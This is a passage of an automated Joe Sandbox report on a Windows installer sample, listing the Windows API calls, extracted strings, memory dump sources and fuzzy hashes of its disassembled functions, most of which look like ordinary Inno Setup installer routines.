                                                                                            • Opcode ID: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
                                                                                            • Instruction ID: 68feaf95479c8b0f8d19ac4d8bed049c81d0e9902cdc902b6301711e3864cdc7
                                                                                            • Opcode Fuzzy Hash: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
                                                                                            • Instruction Fuzzy Hash: 435152B0A01248AFDB50DFA5C885BDEBBF8FF49304F08447AE845EB251D7789944CB64
                                                                                            APIs
                                                                                            • 73A0A570.USER32(00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EE12
                                                                                              • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042EE35
                                                                                            • 73A0A480.USER32(00000000,?,0042EF21,00000000,0042EF1A,?,00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000), ref: 0042EF14
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                            • String ID: ...\
                                                                                            • API String ID: 2998766281-983595016
                                                                                            • Opcode ID: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
                                                                                            • Instruction ID: f7e46b9156472dd3d3dfb1d2a9ceb23c9820bf6754630174aa29599cfb354949
                                                                                            • Opcode Fuzzy Hash: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
                                                                                            • Instruction Fuzzy Hash: E0318170B00128ABDF11EF9AD841BAEB7B9EB48308F91447BF410A7291D7785D45CA69
                                                                                            APIs
                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00454848
                                                                                            • GetLastError.KERNEL32(0000003C,00000000,00454891,?,?,?), ref: 00454859
                                                                                              • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                            • String ID: <$SuG
                                                                                            • API String ID: 893404051-1504269210
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                            • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitMessageProcess
                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                            • API String ID: 1220098344-2970929446
                                                                                            APIs
                                                                                              • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455E48
                                                                                            • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455E75
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                                                            • API String ID: 1312246647-2435364021
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456366
                                                                                            • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00456403
                                                                                            Strings
                                                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456392
                                                                                            • Failed to create DebugClientWnd, xrefs: 004563CC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                            • API String ID: 3850602802-3720027226
                                                                                            APIs
                                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                            • GetFocus.USER32 ref: 004771FF
                                                                                            • GetKeyState.USER32(0000007A), ref: 00477211
                                                                                            • WaitMessage.USER32(?,00000000,00477238,?,00000000,0047725F,?,?,00000001,00000000,?,?,?,0047E9E6,00000000,0047F8E7), ref: 0047721B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FocusMessageStateTextWaitWindow
                                                                                            • String ID: Wnd=$%x
                                                                                            • API String ID: 1381870634-2927251529
                                                                                            APIs
                                                                                            • FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D640
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D64F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$File$LocalSystem
                                                                                            • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                            • API String ID: 1748579591-1013271723
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                            • API String ID: 47109696-2631785700
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F79
                                                                                            • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481F9C
                                                                                            Strings
                                                                                            • CSDVersion, xrefs: 00481F70
                                                                                            • System\CurrentControlSet\Control\Windows, xrefs: 00481F46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                            • API String ID: 3677997916-1910633163
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531BA,00000000,0045325D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453529,00000000), ref: 0042D8D6
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                            • API String ID: 1646373207-4063490227
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E944), ref: 0042E9D6
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9DC
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: ShutdownBlockReasonDestroy$user32.dll
• API String ID: 1646373207-260599015
APIs
• GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C
Strings
Similarity
• API ID: AddressHandleModuleProc
• String ID: DisableProcessWindowsGhosting$user32.dll
• API String ID: 1646373207-834958232
APIs
  • Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
  • Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
• LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
• GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31
Strings
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: SHPathPrepareForWriteA$shell32.dll
• API String ID: 2238633743-2683653824
APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D), ref: 0047C3C0
• FindClose.KERNEL32(000000FF,0047C3EB,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D,00000000), ref: 0047C3DE
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
APIs
  • Part of subcall function 0042ECA4: GetTickCount.KERNEL32 ref: 0042ECAA
  • Part of subcall function 0042EAFC: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042EB31
• GetLastError.KERNEL32(00000000,004746A1,?,?,0049B178,00000000), ref: 0047458A
Strings
Similarity
• API ID: CountErrorFileLastMoveTick
• String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
• API String ID: 2406187244-2685451598
APIs
• GetDesktopWindow.USER32 ref: 00413D56
• GetDesktopWindow.USER32 ref: 00413E0E
  • Part of subcall function 00418ED0: 6F58C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418EEC
  • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418F09
• SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
Similarity
• API ID: CursorDesktopWindow$Show
• String ID:
• API String ID: 2074268717-0
APIs
• GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
• LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
• LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
Similarity
• API ID: LoadString$FileMessageModuleName
• String ID:
• API String ID: 704749118-0
APIs
• SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E161
  • Part of subcall function 0044C7A4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C7D6
• InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E1E5
  • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
• IsRectEmpty.USER32(?), ref: 0044E1A7
• ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E1CA
Similarity
• API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
• String ID:
• API String ID: 855768636-0
                                                                                            APIs
                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 00493DE8
                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 00493E03
                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 00493E1D
                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 00493E38
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: OffsetRect
                                                                                            • String ID:
                                                                                            • API String ID: 177026234-0
                                                                                            • Opcode ID: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                                            • Instruction ID: 626cbd3239d4ed1d666785e4d5506dc5f63added092c4cfac4a9a75855a5826e
                                                                                            • Opcode Fuzzy Hash: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                                            • Instruction Fuzzy Hash: EF217AB6704201AFD700DE69CD85EABBBEEEBC4304F14CA2AF554C7249D634ED0487A6
                                                                                            APIs
                                                                                            • GetCursorPos.USER32 ref: 00417270
                                                                                            • SetCursor.USER32(00000000), ref: 004172B3
                                                                                            • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                                            • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1959210111-0
                                                                                            • Opcode ID: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                                            • Instruction ID: d42235d32f12bbd537443306c781531a61dc82822ae97907460fdfc4b9dfd860
                                                                                            • Opcode Fuzzy Hash: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                                            • Instruction Fuzzy Hash: E02183313086018BCB20EB69D885AD773B1AB44758F4545ABF895CB352D73DDC82CB89
                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00493A51
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00493A65
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00493A79
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00493A97
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                            • Instruction ID: 4fded1b76b16cf5233eb9f491647a43cf70802087f48ea21bc09c20ce05eabc8
                                                                                            • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                            • Instruction Fuzzy Hash: D011FE72604204ABCB40DEA9D8C4D9B7BECEF4D364B1541AAF918DB246D674ED408BA8
                                                                                            APIs
                                                                                            • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                                            • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                                            • RegisterClassA.USER32(00498598), ref: 0041F4E4
                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 4025006896-0
                                                                                            • Opcode ID: 9da16f95b0ca95f6f98f2aa1ee6ab2fa4b74d09379c763118f1aaf581a933dc1
                                                                                            • Instruction ID: 3ade520867520f28231aed23d56b060c1ae6e85fc3aaaf2b039856689379b016
                                                                                            • Opcode Fuzzy Hash: 9da16f95b0ca95f6f98f2aa1ee6ab2fa4b74d09379c763118f1aaf581a933dc1
                                                                                            • Instruction Fuzzy Hash: 600152B12401047BCB10EF6DED81E9B37999769314B11413BBA05E72E1DA3A9C194BAD
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                                            • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574,0000000A,REGDLL_EXE), ref: 0040D241
                                                                                            • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574), ref: 0040D25B
                                                                                            • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            • Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                            • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                                                            • Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                            • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                            • String ID:
                                                                                            • API String ID: 730355536-0
                                                                                            • Opcode ID: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
                                                                                            • Instruction ID: b5067cfae5201e79e85213ffc863b03902d2ba9507e13bed97c350dada6f2a02
                                                                                            • Opcode Fuzzy Hash: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
                                                                                            • Instruction Fuzzy Hash: 9C01C0706442405EFB19AB69980A7263ED4D79574CF11803BF840A6AF1CAFC48A0CBAF
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 0046EE29
                                                                                            Strings
                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046EE3A
                                                                                            • Unsetting NTFS compression on directory: %s, xrefs: 0046EE0F
                                                                                            • Setting NTFS compression on directory: %s, xrefs: 0046EDF7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                            • API String ID: 1452528299-1392080489
                                                                                            • Opcode ID: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
                                                                                            • Instruction ID: 1e7f5b79b7b83b0710ae0b74761658cb8013dc9fe861025df3af78f0f88b0ad9
